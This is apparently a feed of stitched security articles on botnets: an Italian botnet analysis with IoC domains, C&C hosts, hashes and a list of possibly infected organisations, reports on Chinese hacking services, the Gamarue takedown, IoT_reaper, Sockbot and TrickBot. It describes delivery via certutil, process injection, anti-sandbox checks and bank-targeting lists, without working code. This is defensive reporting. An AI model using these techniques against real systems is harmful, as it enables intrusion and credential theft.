That executable .bat file on a first stage opens up a browser pointing to a legitimate image but later on, it uses a notorious technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here  by carnal0wnage. Basically, the attacker uses the certutil.exe program do download a Base64 encoded payload, to decode it and to run it. This technique is very silent since the User-Agent of certutils.exe is not suspicious because it needs to connect outside the company networks to check certificates, so not much IPS rules on it. The dropped file name unslss.exe appears to be very close to the previously analyzed one (1t.exe) it contacts the same C&C and it behaves in a similar way.   But again we won’t focus on reverse such a malware but rather we wont be able to reach the highest number of IoC to protect as much as possible the victims. By analyzing the Dropping website we founded that a significative number of connections had additional referrers, so we decided to focus our attention on how many DNS were pointing to such a domain. We did it and the result was quite impressive (please see the Dropping URLs IoC Section).

Following the research on the dropping website, we found an interesting log of all the connection coming from possible victims. We collected that log, and we built the following possible infection list (possible Victims). We won’t publish the Victims IP addresses but if you can prove you are legitimated by your company to ask that logs we can give you (for free, of course)  the IP addresses we’ve found related to your company. A detailed list of possible infected networks follows.

Possible Victims:

  • ACI informatica s.p.a.
  • AGOS-AS
  • AGSM Verona Spa
  • ASGARR Consortium GARR
  • Acantho S.p.a
  • Alfanews S.r.l.
  • Ambrogio s.r.l.
  • Asco TLC S.p.A.
  • Autostrade-as
  • BT Italia
  • BT Italia S.p.A.
  • Banca Monte Dei Paschi Di Siena S.P.A.
  • Brennercom S.p.A.
  • COLT Technology Services Group Limited
  • Camera dei deputati
  • Cesena Net srl
  • Clouditalia Telecomunicazioni S.p.A.
  • Comune Di Brescia
  • Comune di Bologna
  • Consortium GARR
  • Consorzio per il Sistema Informativo
  • Costacrociere-as
  • Duebite-as
  • E4A s.r.l.
  • Energente S.r.l.
  • FASTNET SpA
  • FASTWEB SPA
  • FINECO Banca del Gruppo Unicredit
  • Fastweb
  • Forcepoint Cloud Ltd
  • GenyCommunications
  • Global Com Basilicata s.r.l.
  • H3G Italy
  • Hynet S.R.L.
  • IBSNAZ
  • ICT Valle Umbra s.r.l.
  • InAsset S.r.l.
  • InfoCamere SCpA
  • Infracom Italia S.p.A.
  • Inrete s.r.l
  • Insiel- Informatica per il sistema degli enti loca
  • Integrys.it di Stefania Peragna impresa individual
  • Intred S.p.A.
  • KPNQWest Italia S.p.a.
  • LEPIDA
  • Lepida S.p.A.
  • Liguria Digitale S.C.p.A.
  • Linea Com S R L
  • Linkem spa
  • Lombardia Informatica S.p.A.
  • Mandarin S.p.A.
  • Mc-link SpA
  • Metrolink S.R.L.
  • Ministero dell’Interno
  • Mnet srl
  • NGI SpA
  • Nemo S.r.l.
  • Nordcom S.p.a.
  • Officine Informatiche Srl
  • Progetto Evo S.r.l.
  • Provincia di Reggio nell’Emilia
  • Qcom spa
  • Raiffeisen OnLine GmbH
  • Regione Basilicata
  • Regione Toscana
  • Regione Veneto
  • STI ADSL
  • Sardegnait-as
  • Societa’ Gestione Servizi Bp S.p.A.
  • TELEX S.r.l.
  • TWT S.p.A.
  • Telecom Italia
  • Terra S.p.a.
  • Time-net S.r.l.
  • Tiscali SpA
  • Trenitalia SpA
  • Trentino Network S.r.l.
  • Universita’ degli Studi di Milano
  • Venis S.p.A.
  • Videotime SPA
  • Vodafone Group Services GmbH
  • Vodafone Italia DSL
  • Vodafone Omnitel B.V.
  • Vodafone Omnitel N.v.
  • WIIT S.p.A.
  • Welcome Italia S.p.A
  • Wind Telecomunicazioni
  • Wind Telecomunicazioni SpA

Following the found IoC provided by the long “analysis journey”. I managed this analysis over the night, so I am sure there would be some imprecisions, but I preferred to speed up the entire analysis process to give the opportunity to block such infamous threat as soon as possible.

Hope it helps the community.

IoC:

  • eMail:
  • info@amber-kate.com
  • info@fallriverproductions.com
  • Dropping URLS:
  • 185.61.152.71
  • 239outdoors.com
  • bentlabel.com
  • cdvdautomator.com
  • cloudblueprintprogram.com
  • cnchalftone.com
  • comedyyall.com
  • conticellolaw.com
  • couplesdoingbusiness.com
  • dvoper.com
  • equinnex.com
  • ericandchrissy.com
  • evelynleekley.com
  • expungementstennessee.com
  • flaveme.com
  • grkisland.com
  • healingfoodconsulting.com
  • hertzsynergy.com
  • hollywoodisruption.com
  • home-sphere.com
  • integrativenutritiontherapy.com
  • jdkanyuk.com
  • kineloveclips.com
  • kylesinger.com
  • legionchristmas.com
  • menshoesonlinestore.com
  • microtiasurgery.com
  • movielotbar.com
  • muiienweg.com
  • niarhoslondon.com
  • opsantorinitours.com
  • progunjobs.com
  • rocketpak.com
  • scottishwindowsolutions.com
  • silkygames.com
  • snapshotsandwhatnots.com
  • snotterkind.com
  • solespin.com
  • strangerthanchristmas.com
  • synchronr.com
  • taramadden.com
  • terento.website
  • theargumint.com
  • thegildedwren.com
  • thejourneytogodsheart.com
  • thesaltybody.com
  • topsantorinitours.com
  • tuftandneedles.com
  • videospanishlessons.com
  • vovachka.com
  • wall-runners.com
  • war-arena.com
  • www.scottishwindowsolutions.com
  • z1logistics.com
  • zayantetinyhomes.com
  • zefeed.com
  • Command and Controls
  • 185.44.105.97
  • ns15.dreamsinthesun.com
  • bdi2.nomadicdecorator.com
  • elis.k9redemptionrescue.com
  • api.hailstorm360.com
  • cerera.survivalbid.com
  • mark.k9redemptionrescue.org
  • nsc.dayswithsunrays.com
  • at.moonbeammagic.com
  • ssl.vci-cfo.com
  • sip3.propertiesandprojects.com
  • host1.jodiray.com
  • note.lawrencechoy.com
  • note.lawrencechoy.com:80
  • 185.44.105.97:80/200
  • note.lawrencechoy.com:80
  • Hashes
  • 63d6927881d4978da4e162c17d82e9c009d0a93e
  • 7ea33f51b6c4aa54beee7fd878886339c22d2232
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b
  • 839ff9f4c3980ac67d4cbef296520ee364a0911f
  • 8cae0dc9255978a35cfd8db64cbe80001400de9b

The original post published by Marco Ramilli on his blog at the following URL:

Huge Botnet Attacking Italian Companies

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – botnet, hacking)

The post Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet appeared first on Security Affairs.

What has the Necurs botnet been up to?

The Necurs botnet has been slowly growing since late 2012 and still tops the list of largest spam botnets in the world. Since then, the botnet has occasionally stopped or temporarily minimized the sending out of spam but has returned in full force. How big is the Necurs botnet? It’s difficult to say precisely, but the latest information provided by the Cisco Talos team can give a general idea. The researchers analyzed 32 distinct spam … More

Satori variant hacks into mining rigs, steals ETH by replacing wallet address

Qihoo 360 Netlab researchers warn about a new variant of the Satori malware that apparently goes after ether (ETH) mining rigs.The malware, dubbed Satori.Coin.Robber, started to reestablish the Satori botnet

The post Satori variant hacks into mining rigs, steals ETH by replacing wallet address appeared first on The Cyber Security Place.

Satori IoT Botnet Exploits Zero-Day to Zombify Huawei Routers

Although the original creators of the infamous IoT malware Mirai have already been arrested and sent to jail, the variants of the notorious botnet are still in the game due to the availability of its source code on the Internet. Hackers have widely used the infamous IoT malware to quietly amass an army of unsecured internet-of-things devices, including home and office routers, that could be

Coprocessor Attacks: the Hidden Threat

Botnets, DDoS and ransomware attacks, vulnerabilities in Internet of Things devices and Open Source Software, and the generally poor state of information security, dominate the discussion of cybersecurity. These same

The post Coprocessor Attacks: the Hidden Threat appeared first on The Cyber Security Place.

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.

 

Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.

Products

The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit

Conclusion

The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.

 

Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue’s sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet’s command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet’s servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue’s global prevalence.

Figure 1. Gamarue’s global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc
  • Rootkit (included in crime kit) – Injects rootkit codes into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer) ​
  • Teamviewer ($250) – Enables attacker to remotely control the victim machine, spy on the desktop, perform file transfer, among other functions
  • Spreader – Adds capability to spread Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses Domain Name Generation (DGA) for the servers where it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue’s attack kill-chain

Gamarue’s main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disk’s volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication whether the signed in user has administrative rights, and keyboard language setting for the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazahkstan

Before sending to the C&C server, this information is encrypted with RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with RC4 algorithm using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes – time to wait for when to ask the C2 server for the next command
  • Task ID - used by the hacker to track if there was an error performing the task
  • Command – one of the command mentioned above
  • Download URL - from which a plugin/updated binary/other malware can be downloaded depending on the command.

Figure 9. Decrypted reply from C&C server

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list hashes of the processes running on a potential victim’s machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a fake payload is manifested when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn using Gamarue. Since Gamarue’s main purpose is to distribute other malware, hackers earn using pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developers.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

 

 

Microsoft Digital Crimes Unit and Windows Defender Research team

 

 

Get more info on the Gamarue (Andromeda) takedown from the following sources:

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community.

Follow us on Twitter @WDSecurity and Facebook Microsoft Malware Protection Center

Meet IoT_reaper: The New Malware Building a Massive Botnet Army

WannaCry, Petya, the Dyn distributed denial-of-service (DDoS) attack – all now infamous cyberattacks that have defined the modern threat landscape. The latter, which was orchestrated by Mirai malware and took the entire East Coast offline, occurred exactly a year ago, so naturally a successor has emerged. Named IoT_reaper, the new malware doesn’t necessarily depend on cracking weak passwords like Mirai did, but rather exploits vulnerabilities in various Internet of Things (IoT) devices and enslaves them into a botnet army.

IoT_reaper leverages a total of nine vulnerabilities, to be exact. These vulnerabilities were previously disclosed in a plethora of routers and cameras that come from popular manufacturers that produce millions of devices each year. Which means there’s potential for a DDoS attack of massive proportions. In fact, researchers believe IoT_reaper is already halfway there, and has infected nearly two million devices so far. Plus, the army is growing at a mind-boggling rate of 10,000 new devices per day. For reference, it took only 100,000 infected devices for Mirai to flood the internet with traffic and take down DNS provider Dyn last year.

Clearly, it’s crucial users start thinking now about how they can prevent their IoT devices from becoming enslaved into IoT_reaper’s botnet army. To do just that, follow these tips:

  • Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Update your router’s firmware. Fortunately, many of the devices listed have patches available, so it’s important to immediately update your firmware if you haven’t already, as fixes are typically included within each update.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Meet IoT_reaper: The New Malware Building a Massive Botnet Army appeared first on McAfee Blogs.

Infected Minecraft Apps Could Potentially Turn Over 2 Million Android Devices Into a Botnet Army

We all love a good game, especially those that allow us to create and innovate with the touch of our fingertips. That’s why the video game Minecraft, which allows players to build constructions out of textured cubes, has grown in popularity. It’s become so popular, in fact, that there’s even mobile app versions of the game.

And now malicious versions of these apps exist too. Just this week, cybersecurity researchers discovered Minecraft Android apps in the Google Play store that have been infected with Sockbot malware. These eight apps have been designed to enslave the devices that download them into a botnet army, and have impacted almost 2.6 million devices already.

These apps managed to sneak their way onto Google Play through the art of deception. Basically, the infected apps posed as add-on functionality for the popular Minecraft: Pocket Edition (PE) game. They are not official Minecraft apps but instead offer “skins” which can be used to modify the appearance of in-game characters.

Once downloaded, however, the apps’ true intentions come out. At first, it was thought that the apps were originally aimed at generating illegitimate ad revenue. Some apps were found connected to a command-and-control server (C&C) that supplied the apps with a list of ads and metadata to launch ad requests. But instead of generating revenue, Sockbot created a SOCKS proxy, which is basically a gateway between a local network (e.g., all the devices in one building) and a larger-scale network, in order to enslave devices into a botnet army. And so far, its recruited quite a few soldiers, as its been reported that 2.6 million devices have been hit already.

Fortunately, these apps have been flagged to Google, who quickly removed them from their official app store. However, with millions of devices already impacted, it’s important Android users keep these tips in mind:

  • Only download apps from the original developer. As fun as it is to enhance your game, you should only download add-ons and alternative apps that have been created by the original developer. In the case of Sockbot malware, Android users could’ve avoided infection if they only downloaded applications from the makers of Minecraft themselves.
  • Do your homework.Before you download an app, make sure you head to the reviews section of an app store first. Take the time to sift through the reviews, and keep an eye out for ones that mention that the app has had issues with security or might be a bit sketchy. It helps to research the developer too. When in doubt, don’t download any app that is remotely questionable.
  • Use a mobile security solution. As malware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Infected Minecraft Apps Could Potentially Turn Over 2 Million Android Devices Into a Botnet Army appeared first on McAfee Blogs.

TrickBot’s New Magic Trick: Sending Spam

TrickBot's New Magic Trick ==>  Sending SPAM

It has been a while since we had a blog from Arsh Arora, who is pursuing his Ph.D., which has kept him away from blogging for a bit. With his current focus on analyzing Banking Trojans and Ransomware, he came across something this weekend that was too interesting not to share!  Take it away, Arsh!

A couple of weeks ago, Gary (the boss) asked me to look into TrickBot samples as they are known to extract Outlook credentials (malwarebytes blog) and he needed confirmation. I ran the samples through Cuckoo sandbox but couldn’t gather much information because of the short run time.  As is often the case, many malware samples don't show their full capabilities without informed human interaction.  Therefore, I moved on to my favorite thing “Double click and wait for the magic.”

First Stage – Extracting the Config File

During the first run, Clifford Wilson, a new malware researcher in our lab, helped in extracting some valuable indicators. In the initial stage, we found out that when testing the TrickBot binary:

Original binary hash – 0c9b1b5ce3731bf8dbfe10432b1f0c2ff48d3ccdad6a28a6783d109b1bc07183
Downloaded binary hash - ce806899fc6ef39a6f9f256g4dg3d568e46696c8306ef8ge96f348g9a68g6660

The original binary launches a child process and then it gets replaced by a different binary that is downloaded. The downloaded binary launches a child process and the TrickBot sample gets activated after these steps.

When analyzing we found out that it launches several “svchost.exe,” it varies from 4 to 7 depending upon the time of your run.


Fig. 1: TrickBot binary with "svchost.exe"

Each of the scvhost instances have their own significance:

Svchost 1: Appears to be used to search and receive certificates

Svchost 2:  Contains strings referring to 127 different financial institutions. (complete list is mentioned below)

Svchost 3: Is the one that collects data from Outlook\Profiles such as username, password, servers, ports
Fig. 2: Outlook exfiltration 

Svchost 4: Scans the internet history to search for stored credentials

Svchost 5: Contain a list of random email ids, research is being to understand the use of those emails.

Confirmation of Svchost being launched by TrickBot binary

In order to confirm our hypothesis about the various svchost being launched by a single process and not more than one processes, researchers tested a different binary and found the results to be identical. We used Process Monitor to confirm the creation of "Svchost.exe" by the same process.

Fig. 3: Svchost Create Process


Config File : Svchost 2

adelaidebank[.]com[.]au
anzdirect[.]co[.]nz
anztransactive[.]anz[.]com
arabbank[.]com[.]au
asb[.]co[.]nz
bankcoop[.]ch
bankleumi[.]co[.]uk
bankline[.]natwest[.]com
bankline[.]rbs[.]com
bankofireland[.]com
bankofmelbourne[.]com[.]au
bankofscotland[.]co[.]uk
banksa[.]com[.]au
banksyd[.]com[.]au
bankwest[.]com[.]au
barclays[.]co[.]uk
barclays[.]com
barclayswealth[.]com
bcv[.]ch
bendigobank[.]com[.]au
beyondbank[.]com[.]au
bibplus[.]uobgroup[.]com
bizchannel[.]cimb[.]com
bmo[.]com
bmoharris[.]com
bnz[.]co[.]nz
boi-bol[.]com
boqspecialist[.]com[.]au
business[.]hsbc[.]co
cams[.]scotiabank[.]com
cibc[.]com
citibank[.]com[.]sg
citibusiness[.]citibank[.]com
coinbase[.]com
co-operativebank[.]co[.]uk
corp[.]westpac[.]co
corp[.]westpac[.]com
corpnet[.]lu
coutts[.]com
cua[.]com[.]au
danskebank[.]ie
defencebank[.]com[.]au
dev[.]bmo[.]com
ebanking[.]hsbc[.]co
ebanking[.]zugerkb[.]ch
fidunet[.]lu
flexipurchase[.]com
greater[.]com[.]au
gtb[.]unicredit[.]eu
harrisbank[.]com
heartland[.]co[.]nz
hsbc[.]com[.]au
humebank[.]com[.]au
hypovereinsbank[.]de
ib[.]boq[.]com
ib[.]kiwibank[.]co
icicibank[.]com
imb[.]com[.]au
internationalmoneytransfers[.]com[.]au
iombankibanking[.]com
kbc[.]ie
lloydsbank[.]co[.]uk
lloydsbank[.]com
lukb[.]ch
macquarie[.]com[.]au
maybank[.]com[.]sg
mebank[.]com[.]au
metrobankonline[.]co[.]uk
my[.]commbiz[.]commbank[.]au
mystate[.]com[.]au
nab[.]com[.]au
nationwide[.]co[.]uk
navyfederal[.]org
netteller[.]com[.]
newcastlepermanent[.]com[.]au
nwolb[.]com
ocbc[.]com
online[.]anz[.]com
online[.]lloydsbank[.]com
onlinebanking[.]iombank[.]com
onlinesbiglobal[.]com
postfinance[.]ch
qtmb[.]com[.]au
rabobank[.]co[.]nz
rabobank[.]com[.]au
rabodirect[.]co[.]nz
rabodirect[.]com[.]au
raiffeisendirect[.]ch
rbc[.]com
rbsdigital[.]com
rbsiibanking[.]com
ruralbank[.]com[.]au
salesforce[.]com
santander[.]co[.]uk
sbisyd[.]com[.]au
sbs[.]net[.]nz
scotiabank[.]com
secure[.]societegenerale[.]fr
secure[.]wellsfargo[.]com
standardchartered[.]com
standardchartered[.]com[.]sg
stgeorge[.]com[.]au
suncorpbank[.]com[.]au
tdcommercialbanking[.]com
tmbank[.]com[.]au
tsb[.]co[.]uk
tsbbank[.]co[.]nz
tsw[.]com[.]au
ubank[.]com[.]au
ubs[.]com
ulsterbankanytimebanking[.]co[.]uk
ulsterbankanytimebanking[.]ie
unicredit[.]it
unicreditbank[.]ba
unicreditbank[.]lu
unicreditbank[.]sk
unicreditbanking[.]net
unicreditcorporate[.]it
uobgroup[.]com
valiant[.]ch
wellsfargo[.]com
westpac[.]co[.]nz
westpac[.]com[.]au

This is the comprehensive list of all the unique financial institutions mentioned in the Svchost 2. It will be safe to assume that the TrickBot binary is targeting these institutions.  We have demonstrated that some of the brands experience quite sophisticated injections, prompting for the entry of credit card, date of birth, or mother's maiden name information, which is sent to the criminal.

The binary creates a folder 'winapp' under Roaming and stores all the files in that location, which is covered in the MalwareBytes blog. If your institution is here and you need more information about the inject script, contact us.

An update on the MalwareBytes blog is that the it downloads an executable named "Setup.exe" under WinApp. The interesting thing about the executable is that it is downloaded as a png and then converted into an exe. The URLs the executable is downloaded are:



http://www[.]aharonwheelsbolsta[.]com/worming[.]png
http://www[.]aharonwheelsbolsta[.]com/toler[.]png

